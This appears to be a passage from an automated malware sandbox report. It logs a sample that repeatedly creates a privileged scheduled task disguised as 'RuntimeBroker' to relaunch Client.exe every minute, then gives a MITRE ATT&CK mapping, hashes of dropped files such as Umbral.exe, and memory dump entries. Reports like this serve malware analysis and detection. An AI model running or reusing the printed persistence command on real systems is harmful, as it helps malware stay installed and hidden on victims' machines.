C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:3988

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:3696

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:2664

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:1068

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:2616

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:1112

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:4904

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:4656

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:2152

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:4400

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:1120

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:2232

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:5056

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:3184

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:4816

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:4084

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:4080

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:4412

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:2324

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:4416

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:4932

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:1584

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:3316

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:3356

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:5108

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:3964

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:4860

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:2704

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:1140

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:212

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:2216

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:612

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:2976

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:2412

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:2708

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:4680

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:4176

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:3932

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:4816

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:1508

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:1992

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:4412

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:4940

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:752

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:2092

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:4344

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:3908

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:3204

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:5020

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:116

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:2904

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:1400

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:712

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:4416

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:904

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:1836

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:3236

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:1704

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:3968

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:3356

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:1488

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:4084

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:3964

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:3528

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:5072

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:2076

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:1420

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:2536

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:904

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:4968

C:\Windows\SYSTEM32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST & exit
8⤵
PID:1500

C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "RuntimeBroker" /tr "C:\Windows\Sub\Client.exe" /RL HIGHEST
9⤵
- Creates scheduled task(s)
PID:3316

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
948B

MD5
c9b6705519e1eef08f86c4ba5f4286f3

SHA1
6c6b179e452ecee2673a1d4fe128f1c06f70577f

SHA256
0f9cad44a79126871580e19b01dc3f880c5173b1faaf8b9018d5d1f829714705

SHA512
6d8f85a7a8b0b124530f36a157cd0441b5c1eacdc35e274af9fbf0569d03d1d5e468651a5b2425f0215c282ecfa7b1ffeaeeaf18612822f00bd14306d30640c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
dfefa0b2348e2bf802d24eb6f316cf1f

SHA1
259864d4720c10a015b8f69996bcaeaeeaa2b0a6

SHA256
4c7b8b3ad7acb305c9cd857d715db10f83f27e31011693e18ade9b7ec8a5934d

SHA512
d68da96e873ebb28e8131cbbfb031bdc7c39598734bc02b8feb365579f96b50eb692fa8e955c9c1444b01d7775a1f7e5125a8254e45cea3c64e63c0e0a115037

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c84d323a1972e30971e8535cb51648ab

SHA1
ade49fa62de6a92be9f8d869c039cb4449537809

SHA256
b6f9bea53be6ed16a77930454b3f1f1c0db0ee5d34f539c4c51263f8adbc7743

SHA512
b0cc02f7ebb086474488b6a7ac0da6591ce4a495a4ea0bbd67af720198f1e1d2e2baebe49eee52faa911adc3425bc0a6de7d18870f2daf6c9ad8c4ccf168fb7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
db516858bc7d44d795f3db27e4727215

SHA1
641935cf474bc80e5639d4ee7ecde6c49f8437e0

SHA256
ee52dc7a60da00f667c711173c0d8631a3f7fb4c00e7c8f93c1f075d2c5ff805

SHA512
113f3ac6be9ef113d201b1a8476cf1d02cf8292d52f9550670988cf17b0b679c691f7703a250469bf00cc1a3d4819ffb255677ffea2883b8329860e94f88cc60

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe
Filesize
594KB

MD5
58a2609f4f86e63089934ba0bab2ced9

SHA1
a4a7bca4a74ece9b0a2ba7c77e2dd25e53be2bea

SHA256
e2198f144eb66741b9aaffe44d5886cd80548602495a719f5a5b34ba3e12c8d6

SHA512
c6a7ad6b0d3a65eba5401fe0793bc12c8f5b00fcc48739401cb0988153ca4f43c34e8bc580d3c52edf1197d73e097ed95b455918b2551cdeb8ee35a81ecc486d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Expensive.bat
Filesize
733KB

MD5
ab7ca8b87249457d23cd632d21183dfc

SHA1
d234f7e75f972baa135ab8505e44fcd478c04447

SHA256
e1437b2de1ccd08aab8f31532cf8109afdb84782c8927f3feeea25ba6be10c6e

SHA512
cd70a7400bc54bbcdb9c6c113e4785a7d3025a740415de997168d184950e874bc4b0c73448facdc89c8afbbdeef6b26deff703f19494bb56bf504d922f17dfa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ExpensiveLauncher.exe
Filesize
101KB

MD5
0593b521f3e8af295d523ea480388b0f

SHA1
39fc9ab8b8663801319557b06defb2a50e0c5d08

SHA256
3247a643a33c091fe826b3ce8e5e9524c5863e3c71eb9168f1bf52520742a8b9

SHA512
adc9c7875965c06fda648dce41975e1a7b7ef44b233a20efdebeae61e8b99c8e2cf809112cf3e4c1aaf00a2d1dd5c39a0be68541782aea9cbe87f12044c81b6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
Filesize
229KB

MD5
f4e8be6083edefb0d64e02b0fb5d1871

SHA1
ae63421a26e2f149f499f7153fd27109718f4cd2

SHA256
7db00186278b889396e94458ad13c6703b7ac7bcb2d78b9ef6852511309d5832

SHA512
12062389ae759edf9fb8311f919f6db15e018fdcbf3acc0ddca181a593c5a2048ebf3a4dfbec61e1818e9df2ed8e9c3e8f099e13594bb0bcf351d5bd175ebdaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dimdea4s.vya.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_451.vbs
Filesize
115B

MD5
8ee7d2a02a6ff2d2da40fb8bde563057

SHA1
5149f4e9b5bd770bf6232ca148d8cb24336cfecd

SHA256
bd95bdda5f58ec4bb3457ec70052ad4158aba496abb775a5a6740dc750870a7b

SHA512
356c9a3b89d4c5d07105e0f643e7c6e6847c7c44ad8c81f926bec0f180736062c2b47f2d14f1110a3210208cedeb896c91532d66edf85defa9aae2ce7a1ea860

Download Submit
C:\Windows\xdwd.dll
Filesize
136KB

MD5
16e5a492c9c6ae34c59683be9c51fa31

SHA1
97031b41f5c56f371c28ae0d62a2df7d585adaba

SHA256
35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66

SHA512
20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

Download Submit
memory/1772-99-0x00000266F8300000-0x00000266F8376000-memory.dmp

Filesize
472KB

Download
memory/1772-100-0x00000266F7A60000-0x00000266F7AB0000-memory.dmp

Filesize
320KB

Download
memory/1772-71-0x00000266F5C70000-0x00000266F5CB0000-memory.dmp

Filesize
256KB

Download
memory/1772-138-0x00000266F7AB0000-0x00000266F7AC2000-memory.dmp

Filesize
72KB

Download
memory/1772-137-0x00000266F6170000-0x00000266F617A000-memory.dmp

Filesize
40KB

Download
memory/1772-101-0x00000266F7B00000-0x00000266F7B1E000-memory.dmp

Filesize
120KB

Download
memory/3100-8-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp

Filesize
10.8MB

Download
memory/3100-15-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp

Filesize
10.8MB

Download
memory/3100-1-0x00007FFCCB8F3000-0x00007FFCCB8F5000-memory.dmp

Filesize
8KB

Download
memory/3100-0-0x0000000000120000-0x00000000001BC000-memory.dmp

Filesize
624KB

Download
memory/3652-83-0x00000000003A0000-0x000000000043A000-memory.dmp

Filesize
616KB

Download
memory/4428-59-0x000002362D050000-0x000002362D0B4000-memory.dmp

Filesize
400KB

Download
memory/4856-28-0x0000029B71D40000-0x0000029B71DCC000-memory.dmp

Filesize
560KB

Download
memory/4856-22-0x0000029B71810000-0x0000029B71832000-memory.dmp

Filesize
136KB

Download
memory/4856-27-0x0000029B717C0000-0x0000029B717C8000-memory.dmp

Filesize
32KB

Download